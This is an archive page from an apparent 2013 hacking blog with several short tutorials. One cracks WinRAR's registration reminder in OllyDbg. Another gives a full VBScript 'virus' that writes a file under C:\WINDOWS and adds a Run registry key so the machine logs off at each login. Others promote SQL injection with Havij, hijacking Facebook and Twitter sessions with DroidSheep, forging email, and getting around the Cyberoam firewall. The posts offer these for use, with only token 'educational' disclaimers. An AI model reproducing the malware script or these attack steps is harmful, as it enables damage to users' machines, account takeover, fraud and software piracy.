Posts

Showing posts from February, 2013

Reverse Engineering Tutorial

Image
 Here I will show you reverse engineer with Winrarusing Olly debugger. In this tutorial I will show you the attackers approach of simply hacking a software with just basic understanding of Assembly. You will need  Olly dbg(v 1.10)  and Winrar Our target is to bypass the registration screen that pops in-front of us everytime we load winrar. We have to prevent that screen from appearing without registering the software. So all we have to do is get rid of this Reminder. POINT 1 - Run olly dbg and open winrar in it by dragging it and dropping it in olly dbg. POINT  2 - You will find a screen similar to it. If you have read the previous two tutorials of this series thaen it will help you understand the things that will come in-front of you else everything will appear Greek. You will find something similar to this. Go through the whole code once. POINT  3 - Now right clcik on the CPU main thread module and go to  Search For > All Referenced text Str

How to create virus

1  Virus Creation Tricks  Just open the Notepad and type the paste the following Code . set ws=createobject("wscript.shell") dim strDir,strfile,st,strtxt2,strshell,strlog dim obfso,obfolder,obshell,obfile,obtxtfile strshell="wscript.shell" strDir="C:\WINDOWS" strfile="\wscript.vbs" st=Chr(34) strlog="shutdown -l" strtxt2="ws.run(strlog)" set obfso=CreateObject("Scripting.FileSystemObject") on error resume next set obfile=obfso.CreateTextfile(strDir & strfile) obfile.writeline("set ws=createobject("&st&strshell&st&")") obfile.writeline("ws.run("&st&strlog&st&")") ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ” Now Save This Notepad file With Any Name Having  .vbs Extension .  2  Virus Creation Trick   Start Start Start  and then save it with .bat extension.

SQL INJECTION WITH HAVIJ

Image
SQL Injection  is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. According to HACKERS the most common technique to HACK a Website is SQL INJECTION. In this technique HACKERS insert SQL codes into the login forms ( Username & Password) to deface and access the site. Now these days SQL injection is quite easy to perform with the automatic tools of SQL to hack the websites this makes script kiddies job more easy. Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page Supported Databases with injection methods   MsSQL 2000/2005 with error MsSQL 2000/2005 no error union based Sybase (ASE)  MySQL union based MySQL Blind MySQL error based Oracle union based MsAccess union based Follow Steps           Download  HAVIJ   here Step 1  : Firstly  find SQL injection Vulnerability and insert the string (like http://www

HOW TO FIND HIDDEN PASSWORD UNDER ASTERISKS

Image
Welcome to "BLACKBACKHAKERS - An approach to introduce people with the truth of HACKING". Often we use the " Remember Me " feature in most form logins to help the signing in process faster. But taking advantage of that sometimes makes us forget what our real passwords are. If you often stare at the asterisks and wonder what’s your actual password, try this trick. Thais trick only work for Mozilla Firefox. Add on  :   Show My Password To reveal password under asterisks just double click on text box where password is saved.

HOW TO HACK FACEBOOK, TWITTER WITH ANDROID APP DROIDSHEEP

Image
Welcome again to "BLACKBACKHAKERS - An approach to introduce people with the truth of HACKING".  DriodSheep  is awesome Session Hijacking Android app that can be use to hijack Wifi Sessions. Currently It support  Open  and  WEP Encrypted networks  that includes  WPA and WPA2 networks (PSK)  DroidSheep enables Android-based man in the middle attacks against a wide range of Web sites, including Facebook.com, Flickr.com, Twitter.com, Linkedin.com, and non-encrypted services like “maps” on Google. There are many users that do not known that air is the transmission medium when using WiFi. Therefore information is not only transferred to its receiver but also to any other party in the network within the range of the radio waves.  Usually nothing special happens because the WiFi users discard packets that are not destined to themselves. DroidSheep does not do this. It reads all the packets looking at their contents. Is a website sending a clear recognition feature with

HOW TO SEND FAKE E-MAIL

Image
Today in this post I'll tell you how can you send fake and anonymous mails to any one. This technique is called E-MAIL FORGING.  E-MAIL FORGING is a art to sending fake emails without knowing the password of victim. WARNING : This article is only for educational purpose don't misuse this.  www.emkei.cz  - SEND FAKE E-MAIL  is the fabulous online website, used to send fake and anonymous email.  All Sent e-mails go to INBOX.  Click on link :   www.emkei.cz   WARNING :  By sending a fake email or prank email you may be committing the offence of fraud even you did not intend to. You are not allowed to use this service for any  illegal activities  at any time.

Hack Cyberoam to Access all blocked sites

Image
How to Hack Cyberoam to Access all blocked sites in college/firm Hello Frens I am back with another hacking tutorial . This time I will explain you all " How to  Hack  or Unblock cyberoam  to access all blocked sites in college or company" . Tutorial will be noob friendly as everything is explained with the help of snapshots...So to know How to hack  cyberoam  Read On.... First of all Guys You Must Know What is Cyberoam and What Idea it uses to block the user. What is Cyberoam : Cyberoam is Identity-based unified threat management appliances, offer comprehensive threat protection with firewall-VPN, anti-virus, anti-spam, intrusion prevention system, content filtering in addition to bandwidth management and multiple link load balancing and gateway failover. Identity-based controls and visibility are critical components of network security. With identity and network data combined, enterprises are able to identify patterns of behavior by specific users or groups